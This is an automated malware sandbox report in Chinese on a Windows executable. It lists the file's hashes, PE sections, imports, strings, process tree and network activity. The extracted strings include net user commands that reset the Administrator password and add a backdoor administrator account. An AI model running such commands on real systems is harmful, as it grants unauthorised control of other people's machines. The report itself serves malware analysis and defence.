分析任务

分析类型 虚拟机标签 开始时间 结束时间 持续时间
文件 (Windows) win7-sp1-x64-shaapp03-2 2021-04-21 21:41:57 2021-04-21 21:44:00 123 秒

魔盾分数

3.75

可疑的

文件详细信息

文件名 你看看.exe
文件大小 658566 字节
文件类型 PE32 executable (GUI) Intel 80386, for MS Windows
MD5 7e27ac9e820d387dded0c1b2757e1420
SHA1 ec17ebfd30e2a463c96c2e3ef9d0c33355ad9fa4
SHA256 92533ccf75913058b3d68e369a55c80a1818bb7bb53921585bad408bd6c90d9f
SHA512 dd349949b1f2ff4dfd90c842d27fdc82c6dc5ef485f4d777784d24769336dc0adcf698bd22ff405a657379612ded55020a2d5ed2fb19b1eba0854b3ecaa09e38
CRC32 FBE40411
Ssdeep 12288:EhGCyqSA26tTigiyv22zrREO2BGayHK8RU6ER6vFsRgRTsc/znDLlUoQh6S1:Eh7yqxdN748KlBoHK8ROislc/zDL4r1
Yara 登录查看Yara规则
样本下载 提交漏报

登录查看威胁特征

运行截图


访问主机纪录 (可点击查询WPING实时安全评级)

无主机纪录.

域名解析 (可点击查询WPING实时安全评级)

域名 安全评级 响应
acroipm.adobe.com CNAME acroipm.adobe.com.edgesuite.net
CNAME a1983.dscd.akamai.net
A 104.75.169.10
A 104.75.169.8

摘要

登录查看详细行为信息

PE 信息

初始地址 0x00400000
入口地址 0x00403861
声明校验值 0x00000000
实际校验值 0x000af2c4
最低操作系统版本要求 4.0
编译时间 1972-12-25 13:33:23
载入哈希 9165ea3e914e03bda3346f13edbd6ccd
图标
图标精确哈希值 7e8d0dbe5de19f74f384ae459c5abecf
图标相似性哈希值 439e81c5165936c3ea55d4df339c6380

版本信息

LegalCopyright
FileVersion
Comments
ProductName
ProductVersion
FileDescription
Translation

PE 数据组成

名称 虚拟地址 虚拟大小 原始数据大小 特征 熵(Entropy)
.text 0x00001000 0x00004dcc 0x00005000 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.52
.rdata 0x00006000 0x00000a4a 0x00001000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 3.56
.data 0x00007000 0x00001f58 0x00002000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 2.86
.data 0x00009000 0x00001000 0x00001000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 1.14
.rsrc 0x0000a000 0x00001048 0x00002000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 4.39

覆盖

偏移量 0x0000c000
大小 0x00094c86

资源

名称 偏移量 大小 语言 子语言 熵(Entropy) 文件类型
RT_ICON 0x0000a5a0 0x00000668 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.62 dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0
RT_ICON 0x0000a5a0 0x00000668 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.62 dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0
RT_ICON 0x0000a5a0 0x00000668 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.62 dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0
RT_GROUP_ICON 0x0000ac08 0x00000030 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.71 MS Windows icon resource - 3 icons, 16x16, 16 colors
RT_VERSION 0x0000ac38 0x00000240 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.83 data
RT_MANIFEST 0x0000ae78 0x000001cd LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 5.08 XML 1.0 document, ASCII text, with very long lines, with no line terminators

导入

库: KERNEL32.dll:
0x406000 GetProcAddress
0x406004 LoadLibraryA
0x406008 CloseHandle
0x40600c WriteFile
0x406010 CreateDirectoryA
0x406014 GetTempPathA
0x406018 ReadFile
0x40601c SetFilePointer
0x406020 CreateFileA
0x406024 GetModuleFileNameA
0x406028 GetStringTypeA
0x40602c LCMapStringW
0x406030 LCMapStringA
0x406034 HeapAlloc
0x406038 HeapFree
0x40603c GetModuleHandleA
0x406040 GetStartupInfoA
0x406044 GetCommandLineA
0x406048 GetVersion
0x40604c ExitProcess
0x406050 HeapDestroy
0x406054 HeapCreate
0x406058 VirtualFree
0x40605c VirtualAlloc
0x406060 HeapReAlloc
0x406064 TerminateProcess
0x406068 GetCurrentProcess
0x406078 WideCharToMultiByte
0x406084 SetHandleCount
0x406088 GetStdHandle
0x40608c GetFileType
0x406090 RtlUnwind
0x406094 GetCPInfo
0x406098 GetACP
0x40609c GetOEMCP
0x4060a0 MultiByteToWideChar
0x4060a4 GetStringTypeW
库: USER32.dll:
0x4060ac MessageBoxA
0x4060b0 wsprintfA

.text
`.rdata
@.data
.data
.rsrc
u hxb@
YYh p@
DSUVWh
SVWUj
[Sh,f@
"WWSh(f@
^Vh,f@
PVh(f@
runtime error
Microsoft Visual C++ Runtime Library
Program:
<program name unknown>
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
GetProcAddress
LoadLibraryA
CloseHandle
WriteFile
CreateDirectoryA
GetTempPathA
ReadFile
SetFilePointer
CreateFileA
GetModuleFileNameA
KERNEL32.dll
MessageBoxA
wsprintfA
USER32.dll
HeapAlloc
HeapFree
GetModuleHandleA
GetStartupInfoA
GetCommandLineA
GetVersion
ExitProcess
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
HeapReAlloc
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
RtlUnwind
GetCPInfo
GetACP
GetOEMCP
MultiByteToWideChar
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
Error
Failed to read data from the file!
Failed to read file or invalid data in file!
Invalid data in the file!
The interface of kernel library is invalid!
The kernel library is invalid!
GetNewSock
Failed to load kernel library!
Not found the kernel library!
krnln.fne
krnln.fnr
Failed to decompress data!
Insufficient memory!
E_N%X
Can't retrieve the temporary directory!
Can't open file!
invalid bit length repeat
too many length or distance symbols
invalid stored block lengths
invalid block type
invalid distance code
invalid literal/length code
1.1.3
need dictionary
incorrect data check
incorrect header check
invalid window size
unknown compression method
incomplete dynamic bit lengths tree
oversubscribed dynamic bit lengths tree
incomplete literal/length tree
oversubscribed literal/length tree
empty distance tree with lengths
incomplete distance tree
oversubscribed distance tree
incompatible version
buffer error
insufficient memory
data error
stream error
file error
stream end
const
net user Administrator zzyyyds
net user zzyyyds 666666 /add
net localgroup administrators 666666 /add
@reloc1
wwwwwwwwwwwwwwwwwwwwwwww
O(uckHr
4 Kgx
yyzTi
~.Eq=
TUXy%
VS_VERSION_INFO
StringFileInfo
080404B0
FileVersion
1.0.0.0
FileDescription
ProductName
ProductVersion
1.0.0.0
LegalCopyright
Comments
(http://www.eyuyan.com)
VarFileInfo
Translation
没有防病毒引擎扫描信息!

进程树


_________.exe, PID: 2540, 上一级进程 PID: 2232
net.exe, PID: 2696, 上一级进程 PID: 2540
net.exe, PID: 2740, 上一级进程 PID: 2540
net.exe, PID: 2792, 上一级进程 PID: 2540
net1.exe, PID: 2996, 上一级进程 PID: 2740
net1.exe, PID: 2892, 上一级进程 PID: 2696
net1.exe, PID: 3048, 上一级进程 PID: 2792

访问主机纪录 (可点击查询WPING实时安全评级)

无主机纪录.

TCP

源地址 源端口 目标地址 目标端口
192.168.122.202 49166 104.75.169.10 acroipm.adobe.com 80

UDP

源地址 源端口 目标地址 目标端口
192.168.122.202 50785 192.168.122.1 53

域名解析 (可点击查询WPING实时安全评级)

域名 安全评级 响应
acroipm.adobe.com CNAME acroipm.adobe.com.edgesuite.net
CNAME a1983.dscd.akamai.net
A 104.75.169.10
A 104.75.169.8

TCP

源地址 源端口 目标地址 目标端口
192.168.122.202 49166 104.75.169.10 acroipm.adobe.com 80

UDP

源地址 源端口 目标地址 目标端口
192.168.122.202 50785 192.168.122.1 53

HTTP 请求

URI HTTP数据
URL专业沙箱检测 -> http://acroipm.adobe.com/11/rdr/CHS/win/nooem/none/message.zip
GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1
Accept: */*
If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT
User-Agent: IPM
Host: acroipm.adobe.com
Connection: Keep-Alive
Cache-Control: no-cache

SMTP 流量

无SMTP流量.

IRC 流量

无IRC请求.

ICMP 流量

无ICMP流量.

CIF 报告

无 CIF 结果

网络警报

无警报

TLS

No TLS

Suricata HTTP

No Suricata HTTP

未发现网络提取文件
抱歉! 没有任何文件投放。
没有发现相似的分析.
HTML 总结报告
(需15-60分钟同步)
下载

Processing ( 14.662 seconds )

  • 10.451 Suricata
  • 1.557 VirusTotal
  • 0.764 NetworkAnalysis
  • 0.696 Static
  • 0.426 peid
  • 0.359 TargetInfo
  • 0.205 BehaviorAnalysis
  • 0.19 Strings
  • 0.011 AnalysisInfo
  • 0.002 Memory
  • 0.001 config_decoder

Signatures ( 1.492 seconds )

  • 1.326 md_url_bl
  • 0.016 antiav_detectreg
  • 0.011 api_spamming
  • 0.01 md_domain_bl
  • 0.008 stealth_timeout
  • 0.007 stealth_decoy_document
  • 0.007 mimics_filetime
  • 0.007 reads_self
  • 0.007 infostealer_ftp
  • 0.006 stealth_file
  • 0.006 antivm_generic_disk
  • 0.006 virus
  • 0.005 bootkit
  • 0.005 anomaly_persistence_autorun
  • 0.005 antiav_detectfile
  • 0.004 geodo_banking_trojan
  • 0.004 infostealer_bitcoin
  • 0.004 infostealer_im
  • 0.004 ransomware_extensions
  • 0.004 ransomware_files
  • 0.003 maldun_anomaly_massive_file_ops
  • 0.003 antianalysis_detectreg
  • 0.003 infostealer_mail
  • 0.003 network_http
  • 0.002 tinba_behavior
  • 0.002 hancitor_behavior
  • 0.002 antivm_vbox_files
  • 0.002 disables_browser_warn
  • 0.002 network_torgateway
  • 0.001 rat_nanocore
  • 0.001 maldun_malicious_write_executeable_under_temp_to_regrun
  • 0.001 rat_luminosity
  • 0.001 maldun_anomaly_write_exe_and_obsfucate_extension
  • 0.001 betabot_behavior
  • 0.001 kibex_behavior
  • 0.001 shifu_behavior
  • 0.001 maldun_anomaly_write_exe_and_dll_under_winroot_run
  • 0.001 cerber_behavior
  • 0.001 antivm_parallels_keys
  • 0.001 antivm_xen_keys
  • 0.001 bot_drive
  • 0.001 bot_drive2
  • 0.001 browser_security
  • 0.001 modify_proxy
  • 0.001 maldun_malicious_drop_executable_file_to_temp_folder
  • 0.001 md_bad_drop
  • 0.001 network_cnc_http

Reporting ( 0.568 seconds )

  • 0.509 ReportHTMLSummary
  • 0.059 Malheur
Task ID 631862
Mongo ID 60802c377e769a0f72493b73
Cuckoo release 1.4-Maldun